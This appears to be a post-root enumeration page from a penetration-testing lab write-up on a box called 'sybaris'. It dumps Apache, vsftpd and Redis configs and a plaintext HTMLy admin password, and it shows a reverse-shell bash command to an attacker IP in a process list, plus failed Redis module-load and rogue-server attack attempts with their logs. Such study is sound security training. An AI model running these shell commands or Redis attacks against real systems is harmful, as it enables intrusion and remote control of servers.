Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the root user after compromising the target system.
Apache
[root@sybaris etc]# systemctl status httpd.service
● httpd.service - The Apache HTTP Server
Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled; vendor preset: disabled)
Active: active (running) since Fri 2024-08-02 13:10:06 EDT; 7 months 25 days ago
Docs: man:httpd(8)
man:apachectl(8)
Main PID: 905 (httpd)
Status: "Total requests: 0; Current requests/sec: 0; Current traffic: 0 B/sec"
CGroup: /system.slice/httpd.service
├─ 905 /usr/sbin/httpd -DFOREGROUND
├─1080 /usr/sbin/httpd -DFOREGROUND
├─1081 /usr/sbin/httpd -DFOREGROUND
├─1082 /usr/sbin/httpd -DFOREGROUND
├─1083 /usr/sbin/httpd -DFOREGROUND
└─1084 /usr/sbin/httpd -DFOREGROUND
[root@sybaris etc]# cat /usr/lib/systemd/system/httpd.service
[Unit]
Description=The Apache HTTP Server
After=network.target remote-fs.target nss-lookup.target
Documentation=man:httpd(8)
Documentation=man:apachectl(8)
[Service]
Type=notify
EnvironmentFile=/etc/sysconfig/httpd
ExecStart=/usr/sbin/httpd $OPTIONS -DFOREGROUND
ExecReload=/usr/sbin/httpd $OPTIONS -k graceful
ExecStop=/bin/kill -WINCH ${MAINPID}
# We want systemd to give httpd some time to finish gracefully, but still want
# it to kill httpd after TimeoutStopSec if something went wrong during the
# graceful stop. Normally, Systemd sends SIGTERM signal right after the
# ExecStop, which would kill httpd. We are sending useless SIGCONT here to give
# httpd time to finish.
KillSignal=SIGCONT
PrivateTmp=true
[Install]
WantedBy=multi-user.target[root@sybaris etc]# cat httpd/conf/httpd.conf | grep -v '^[#/]'
ServerRoot "/etc/httpd"
Listen 80
Include conf.modules.d/*.conf
User apache
Group apache
ServerAdmin root@localhost
<Directory />
AllowOverride none
Require all denied
</Directory>
DocumentRoot "/var/www/html"
<Directory "/var/www">
AllowOverride None
Require all granted
</Directory>
<Directory "/var/www/html">
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
<IfModule dir_module>
DirectoryIndex index.html
</IfModule>
<Files ".ht*">
Require all denied
</Files>
ErrorLog "logs/error_log"
LogLevel warn
<IfModule log_config_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
<IfModule logio_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
</IfModule>
CustomLog "logs/access_log" combined
</IfModule>
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
</IfModule>
<Directory "/var/www/cgi-bin">
AllowOverride None
Options None
Require all granted
</Directory>
<IfModule mime_module>
TypesConfig /etc/mime.types
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
</IfModule>
AddDefaultCharset UTF-8
<IfModule mime_magic_module>
MIMEMagicFile conf/magic
</IfModule>
EnableSendfile on
IncludeOptional conf.d/*.conf[root@sybaris etc]# cat httpd/conf.d/sybaris.conf
<virtualhost *:80>
ServerName sybaris
ServerAlias sybaris
ServerAdmin admin@example.com
DocumentRoot /var/www/html
<Directory "/var/www/html">
Options FollowSymLinks Indexes
AllowOverride All
Order Allow,Deny
Allow from all
DirectoryIndex index.php
</Directory>
</VirtualHost>Web
[root@sybaris etc]# cd /var/www
[root@sybaris www]# ll
total 8.0K
4.0K drwxr-xr-x. 8 root root 4.0K Sep 4 2020 html
0 drwxr-xr-x. 4 root root 33 Sep 4 2020 .
4.0K drwxr-xr-x. 21 root root 4.0K Sep 4 2020 ..
0 drwxr-xr-x. 2 root root 6 Apr 2 2020 cgi-bin
[root@sybaris www]# ll cgi-bin/
total 0
0 drwxr-xr-x. 4 root root 33 Sep 4 2020 ..
0 drwxr-xr-x. 2 root root 6 Apr 2 2020 .
[root@sybaris www]# ll html
total 84K
0 drwxrwxr-x. 3 root root 54 Sep 4 2020 config
4.0K drwxr-xr-x. 8 root root 4.0K Sep 4 2020 .
0 drwxr-xr-x. 4 root root 33 Sep 4 2020 ..
8.0K -rw-rw-r--. 1 root root 5.6K May 6 2020 .htaccess
4.0K -rw-rw-r--. 1 root root 21 May 6 2020 .updateignore
4.0K -rw-rw-r--. 1 root root 1.8K May 6 2020 COPYRIGHT.txt
20K -rw-rw-r--. 1 root root 18K May 6 2020 LICENSE.txt
8.0K -rw-rw-r--. 1 root root 8.0K May 6 2020 README.md
0 drwxrwxr-x. 2 root root 35 May 6 2020 cache
4.0K -rw-rw-r--. 1 root root 507 May 6 2020 composer.json
12K -rw-rw-r--. 1 root root 8.9K May 6 2020 composer.lock
0 drwxrwxr-x. 2 root root 22 May 6 2020 content
4.0K -rw-rw-r--. 1 root root 1.2K May 6 2020 favicon.ico
4.0K -rw-rw-r--. 1 root root 1.2K May 6 2020 humans.txt
4.0K -rw-rw-r--. 1 root root 108 May 6 2020 index.php
0 drwxrwxr-x. 2 root root 62 May 6 2020 lang
4.0K -rw-rw-r--. 1 root root 1.2K May 6 2020 robots.txt
0 drwxrwxr-x. 8 root root 113 May 6 2020 system
0 drwxrwxr-x. 8 root root 118 May 6 2020 themes
4.0K -rw-rw-r--. 1 root root 1.6K May 6 2020 upload.phpconfig
[root@sybaris config]# cat config.ini | grep -v '^[#/]'
site.url = "/"
timezone = "Asia/Jakarta"
time.format = "d F Y"
language = "en"
blog.title = "Sybaris"
blog.tagline = "Just another HTMLy blog"
blog.description = "Proudly powered by HTMLy, a databaseless blogging platform."
blog.copyright = "(c) Pablo."
permalink.type = "default"
blog.enable = "false"
social.twitter = "https://twitter.com"
social.facebook = "https://www.facebook.com"
social.tumblr = "http://www.tumblr.com"
blog.menu = ""
breadcrumb.home = "Home"
comment.system = "disable"
fb.appid = ""
fb.num = "5"
fb.color = "light"
disqus.shortname = ""
google.wmt.id = ""
google.publisher = ""
google.analytics.id = ""
google.reCaptcha = "false"
google.reCaptcha.public = ""
google.reCaptcha.private = ""
posts.perpage = "10"
category.perpage = "10"
tag.perpage = "10"
archive.perpage = "10"
search.perpage = "10"
profile.perpage = "10"
type.perpage = "10"
json.count = "10"
category.info = "true"
related.count = "3"
recent.count = "5"
popular.count = "5"
author.info = "true"
teaser.type = "full"
read.more = "Read more"
teaser.char = "200"
description.char = "150"
rss.count = "10"
rss.char = "200"
img.thumbnail = "false"
default.thumbnail = ""
views.counter = "false"
sitemap.priority.base = "1.0"
sitemap.priority.post = "0.5"
sitemap.priority.static = "0.5"
sitemap.priority.category = "0.5"
sitemap.priority.tag = "0.5"
sitemap.priority.archiveDay = "0.5"
sitemap.priority.archiveMonth = "0.5"
sitemap.priority.archiveYear = "0.5"
sitemap.priority.author = "0.5"
sitemap.priority.type = "0.5"
prerelease = "false"
cache.expiration = "6"
cache.off = "false"
generation.time = "false"
cache.timestamp = "false"
views.root = "themes/twentysixteen"
views.layout = "layout"
[root@sybaris config]# cat users/pablo.ini
password = PostureAlienateArson345
role = adminFTP
[root@sybaris etc]# ll /etc/vsftpd/
total 28K
12K drwxr-xr-x. 81 root root 8.0K Mar 29 10:08 ..
4.0K -rw-------. 1 root root 189 Sep 4 2020 vsftpd.conf
0 drwxr-xr-x. 2 root root 88 Sep 4 2020 .
4.0K -rw-------. 1 root root 125 Apr 1 2020 ftpusers
4.0K -rw-------. 1 root root 361 Apr 1 2020 user_list
4.0K -rwxr--r--. 1 root root 338 Apr 1 2020 vsftpd_conf_migrate.shvsftpd.conf
[root@sybaris etc]# cat /etc/vsftpd/vsftpd.conf
listen=YES
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_root=/var/ftp
allow_writeable_chroot=YES
anon_umask=000
pasv_enable=Yes
pasv_min_port=10090
pasv_max_port=10100users
[root@sybaris etc]# cat /etc/vsftpd/ftpusers
# Users that are not allowed to login via ftp
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
news
uucp
operator
games
nobody
[root@sybaris etc]# cat /etc/vsftpd/user_list
# vsftpd userlist
# If userlist_deny=NO, only allow users in this file
# If userlist_deny=YES (default), never allow users in this file, and
# do not even prompt for a password.
# Note that the default vsftpd pam config also checks /etc/vsftpd/ftpusers
# for users that are denied.
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
news
uucp
operator
games
nobodyRedis
[root@sybaris etc]# systemctl status redis.service
● redis.service - Redis
Loaded: loaded (/usr/lib/systemd/system/redis.service; enabled; vendor preset: disabled)
Active: active (running) since Fri 2024-08-02 13:10:05 EDT; 7 months 25 days ago
Main PID: 909 (redis-server)
CGroup: /system.slice/redis.service
├─ 909 /usr/local/bin/redis-server 0.0.0.0:6379
├─1737 bash -c bash -i >& /dev/tcp/192.168.45.218/6379 0>&1
└─1738 bash -i
[root@sybaris etc]# cat /usr/lib/systemd/system/redis.service
[Unit]
Description=Redis
After=network.target
[Service]
User=pablo
Group=pablo
ExecStart=/usr/local/bin/redis-server /etc/redis/redis.conf
ExecStop=/usr/local/bin/redis-cli shutdown
Restart=always
[Install]
WantedBy=multi-user.target
[root@sybaris etc]# cat /etc/redis/redis.conf
bind 0.0.0.0
protected-mode no
port 6379
tcp-backlog 511
timeout 0
tcp-keepalive 300
supervised no
pidfile /var/run/redis/redis-server.pid
loglevel notice
logfile /var/log/redis/redis-server.log
databases 16LOAD MODULE
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP MODULE LOAD /home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/module.so
(error) ERR Error loading the extension. Please check the server logs..Failed
[root@sybaris etc]# tail -n 2 /var/log/redis/redis-server.log
17957:M 29 Mar 2025 10:23:02.769 * Ready to accept connections
17957:M 29 Mar 2025 10:28:41.968 # Module /home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/module.so failed to load: /home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/module.so: cannot open shared object file: No such file or directoryAs expected, it searched the local filesystem
Rogue Redis Server
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris/redis-rogue-server]
└─$ python3 redis-rogue-server.py --rhost=$IP --lhost=$tun0 --lport=6379 -v
/home/kali/PEN-200/PG_PRACTICE/sybaris/redis-rogue-server/redis-rogue-server.py:10: SyntaxWarning: invalid escape sequence '\ '
BANNER = """______ _ _ ______ _____
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig
[info] TARGET 192.168.185.93:6379
[info] SERVER 192.168.45.218:6379
[info] Setting master...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.45.218\r\n$4\r\n6379\r\n'
[->] b'+OK\r\n'
[info] Setting dbfilename...
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'*1\r\n$4\r\nPING\r\n'
[<-] b'+PONG\r\n'
[->] b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
[<-] b'+OK\r\n'
[->] b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
[<-] b'+OK\r\n'
[->] b'*3\r\n$5\r\nPSYNC\r\n$40\r\n008b776f1b3180ee407ac27383b491319bd70ea9\r\n$1\r\n1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$44320\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\xa6\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[info] Loading module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b'-ERR Error loading the extension. Please check the server logs.\r\n'
[info] Temerory cleaning up...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
[->] b'+OK\r\n'
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$11\r\nrm ./exp.so\r\n'
[->] b'-ERR unknown command `system.exec`, with args beginning with: `rm ./exp.so`, \r\n'
What do u want, [i]nteractive shell or [r]everse shell: Failed to load the exp.so module
[root@sybaris etc]# cat /var/log/redis/redis-server.log
[...REDACTED...]
17957:S 29 Mar 2025 10:33:14.700 * Connecting to MASTER 192.168.45.218:6379
17957:S 29 Mar 2025 10:33:14.700 * MASTER <-> REPLICA sync started
17957:S 29 Mar 2025 10:33:14.724 # Error condition on socket for SYNC: Connection refused
17957:S 29 Mar 2025 10:33:15.702 * Connecting to MASTER 192.168.45.218:6379
17957:S 29 Mar 2025 10:33:15.702 * MASTER <-> REPLICA sync started
17957:S 29 Mar 2025 10:33:15.721 # Error condition on socket for SYNC: Connection refused
17957:S 29 Mar 2025 10:33:16.704 * Connecting to MASTER 192.168.45.218:6379
17957:S 29 Mar 2025 10:33:16.704 * MASTER <-> REPLICA sync started
17957:S 29 Mar 2025 10:33:16.726 * Non blocking connect for SYNC fired the event.
17957:S 29 Mar 2025 10:33:16.750 * Master replied to PING, replication can continue...
17957:S 29 Mar 2025 10:33:16.786 * Trying a partial resynchronization (request 008b776f1b3180ee407ac27383b491319bd70ea9:1).
17957:S 29 Mar 2025 10:33:16.804 * Full resync from master: ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:1
17957:S 29 Mar 2025 10:33:16.804 * Discarding previously cached master state.
17957:S 29 Mar 2025 10:33:21.805 # Opening the temp file needed for MASTER <-> REPLICA synchronization: Permission denied
17957:S 29 Mar 2025 10:33:21.805 # Module ./exp.so failed to load: ./exp.so: cannot open shared object file: No such file or directory
17957:M 29 Mar 2025 10:33:21.836 # Setting secondary replication ID to 008b776f1b3180ee407ac27383b491319bd70ea9, valid up to offset: 1. New replication ID is b9b570113dbdae11f2c543cc5ebf855f335f9ec3
17957:M 29 Mar 2025 10:33:21.836 * MASTER MODE enabled (user request from 'id=8 addr=192.168.45.218:60768 fd=7 name= age=7 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')17957:S 29 Mar 2025 10:33:21.805 # Module ./exp.so failed to load: ./exp.so: cannot open shared object file: No such file or directory